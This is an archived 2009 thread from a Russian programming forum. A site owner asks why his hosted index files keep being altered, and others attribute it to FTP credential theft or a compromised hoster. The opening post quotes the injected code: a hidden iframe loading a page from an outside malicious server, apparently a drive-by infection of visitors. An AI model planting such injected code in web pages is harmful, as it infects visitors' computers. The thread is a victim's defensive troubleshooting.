Главная страница
Top.Mail.Ru    Яндекс.Метрика
Текущий архив: 2009.09.13;
Скачать: CL | DM;

Вниз

Вопрос по сайту на хостинге   Найти похожие ветки 

 
SP   (2009-07-08 11:34) [0]

Периодически на сайте меняются файлы... В основном index.htm, index.php и т.п. Какая-то зараза дописывает что-то в конец файла... причем некоторые файлы она перед этим обрезает...
Например получается вот такая концовка:


...
exit();
} else {
$xoopsOption["show_cblock"] =1;
include "x2/head
<iframe src="http://a3q.ru:8080/ts/in.cgi?pepsi87" width=125 height=125 style="visibility: hidden"></iframe>


Что это за фигня такая и кто в этом виноват?
В смысле это я где-то что пропустил и оставил дыру, или это вина хостера.
Это что-то уникальное или кто-нить с такой проблемой уже сталкивался?
хостинг: xp-hosting.com


 
SP   (2009-07-08 11:37) [1]

Кстати iframe это первый раз появилось. раньше в индексную страничку добавлялось нечто такое, что могло заразить комп при открытии сайта например в IE (что там было точно не помню, так как не сохранил его), просто приходилось часто заходить по фтп и вычищать эту гадость


 
Anatoly Podgoretsky ©   (2009-07-08 12:04) [2]

> SP  (08.07.2009 11:34:00)  [0]

Это зараза вирус


 
brother ©   (2009-07-08 13:17) [3]

это вирус 100% все претензии к:
> <iframe src="http://a3q.ru:8080/ts/in.cgi?pepsi87" width=125
> height=125 style="visibility: hidden"></iframe>

)))


 
brother ©   (2009-07-08 13:22) [4]

ИМХО, это вина хостера, хотя не факт! Еслиб был хак только тебя - то такой мешанины бы не вставили....


 
antonn ©   (2009-07-08 14:29) [5]


> SP   (08.07.09 11:34)

смени все пароли на ФТП и некоторое время не ходи через него. Если повторится - виноват хостер. Была у меня аналогичная хрень, хостера вообще сменил и прекратилось


 
TIF ©   (2009-07-08 15:35) [6]

Аналогично. Недавно гугл прислал письмо, что у меня вирус на сайте. написла письмо хостеру. Сказали, что читайте FAQ и закрыли моё обращение на странице техподдержки, без возмодности ответить.

В FAQ речь про то, что пароль похитили из моего FTP-клиента, но я не верю - не мог касперский (KIS 2010) с последними базами пропустить что-то подобное ко мне... Ну разве что вирус уж совсем новый o_O Но вероятность - 1%

Проклинаю хостера и держу обиду в себе. Пароль не менял


 
TIF ©   (2009-07-08 15:36) [7]

*извините за опечатки. Это я от гнева )))


 
antonn ©   (2009-07-08 15:37) [8]

пароль в FTP передается открытым текстом :)


 
Урсулапов_   (2009-07-08 18:37) [9]

У меня было такое, и здесь на форуме писал, спрашивал. Оказалось, что из-за того, что пароль от ФТП хранился у меня на ФТП-клиенте. Поменял пароли на ФТП, запомнил у себя в голове и счастлив. :))


 
Урсулапов_   (2009-07-08 18:39) [10]


> Поменял пароли на ФТП

И после того, как перестал хранить пароль на клиенте, такие изменения файлов index.php /index.html  не наблюдаются.


 
SP   (2009-07-09 10:36) [11]


> Урсулапов_   (08.07.09 18:39) [10]
>
>
> > Поменял пароли на ФТП
>
> И после того, как перестал хранить пароль на клиенте, такие
> изменения файлов index.php /index.html  не наблюдаются.


Хм... Что-то не задумывался о том, что такое может быть ...
проверю...


 
KilkennyCat ©   (2009-07-10 06:36) [12]


> не мог касперский


ну-ну. еще как может. Касперский может все. Вот только как антивирус полное говно.


 
brother ©   (2009-07-10 06:43) [13]

эээ, вообще-то любой антивирус может пропустить *PARDON*


 
TIF ©   (2009-07-10 08:09) [14]

> Вот только как антивирус полное говно.

Это говно у меня за шесть лет никакой гадости не пропустило :-P

Не считая моментов, когда я сам по доброте душевной (и ради любопытства тоже) разрешал порезвиться в системных файлах всяким троянам ) Правда даже после таких извращений всю-всю гадость выметал/лечил веник-каспер

Единственные мелкие сюрпризы - это единственный ложный детект Delphi-программки + вот это заражение сайта, которое правда-таки под вопросом (каспер ли не задетектировал ещё неизвестную гадость, которая стянула пароль, или FileZilla сама выслала плохим людям мой пароль... :), но 6 лет и 20 потраченных на исправление "сюрпризов" минут - это небо и земля

Так что пусть каждый сам выберет себе антивирь, на вкус и цвет товарищей нет (+ ещё мало установить, надо ещё суметь оптимально и правильно настроить...)

PS: теперь и Яндекс запустил систему отслеживания сайтов с вирусами, закрывает их заглушками в результатах поиска, как и гугл + в панели вебмастера можно проверить, какие страницы заражены. Вот это хорошая новость, молодцы


 
Anatoly Podgoretsky ©   (2009-07-10 10:56) [15]


> Касперский может все. Вот только как антивирус полное говно.

Касперский хороший антивирус, если только им не лечить.


 
KSergey ©   (2009-07-10 12:58) [16]

Люди, скажите: из FAR"а тоже воруют?


 
TIF ©   (2009-07-10 13:08) [17]

> Люди, скажите: из FAR"а тоже воруют?

ДА
(сам не пользовался, но был свидетелем заражения главной страницы сайта на narod-е, а для обновления сайта использовался FAR...)


 
KSergey ©   (2009-07-10 13:19) [18]

как жить!


 
TIF ©   (2009-07-10 13:48) [19]

Надо свой FTP-клиент написать = )


 
KilkennyCat ©   (2009-07-10 14:19) [20]


> TIF © (10.07.09 08:09) [14]
> Это говно у меня за шесть лет никакой гадости не пропустило
> :-P


Блаженны верующие...
Собственно, я не агитирую. Я не произвожу антивирусов, и касперский мне не конкурент.
Нравится - пользуйся.
Но есть нюанс ;)


 
TIF ©   (2009-07-10 15:02) [21]

> Но есть нюанс ;)

А где их нет? )


 
Eraser ©   (2009-07-10 22:38) [22]

> [0] SP   (08.07.09 11:34)

виноват локальный вирус, который ворует пароли у тотал-коммандера. лечите вирусы, удаляейте тотал коммандеры.


 
Как обычно   (2009-07-11 16:22) [23]


> удаляейте тотал коммандеры.



> Люди, скажите: из FAR"а тоже воруют?


Как всегда, виноваты все вокруг, кроме себя самого - любимого.


 
Real ©   (2009-07-12 21:42) [24]

У меня такое уже раза три было. Пользуюсь фаром, пароли всегда в голове. Последний раз, файлы были отредактированы когда вообще моя машина была выключена. Хостер сказал что мол это не показатель, какая-то бяка перехватывает мои пароли при обращении, а потом использует. Но есть одно но: у меня у вышеупомянутого хостера два аккаунта и на обоих в одно время произошло это. Хотя второй аккаунт, довольно давно не юзал. Вообщем, мне кажется сами хостеры ловят какую-то хрень, но фиг признаются. Радикальный выход - это вообще отказаться от FTP и переходить на использование SSH


 
TIF ©   (2009-07-13 17:03) [25]

> Вообщем, мне кажется сами хостеры ловят какую-то хрень,
> но фиг признаются.

Ура :) Спасибо за информацию, теперь есть хоть какие-то факты в пользу моих подозрений (да и не только моих)


 
SP   (2009-07-13 17:26) [26]

Кстати, кроме сохраненных логина/пароля от фтп хостинга у меня еще и в клиенте были сохраненные логины/пароли от локальных ФТП. Но на них ничего подозрительного вроде не происходило никогда.
Вирусы проверяют IP адреса на серость?


 
Styx_   (2009-07-13 17:29) [27]


> Вирусы проверяют IP адреса на серость?

"Серый" - он потому и серый, что из интернета на него не зайдёшь.



Страницы: 1 вся ветка

Текущий архив: 2009.09.13;
Скачать: CL | DM;

Наверх




Память: 0.53 MB
Время: 0.017 c
6-1206625813
vlad
2008-03-27 16:50
2009.09.13
модем


3-1227089155
Sesh
2008-11-19 13:05
2009.09.13
OracleLob сохранить в текстовый файл


15-1247255297
Shyrick
2009-07-10 23:48
2009.09.13
Сложение чисел в двоичной системе


1-1215107303
Zheksik
2008-07-03 21:48
2009.09.13
Как провести линию на компоненте фигура(Shape)?


4-1215791230
Mielofon
2008-07-11 19:47
2009.09.13
Нужно содержимое большой панели вывести в EMF файл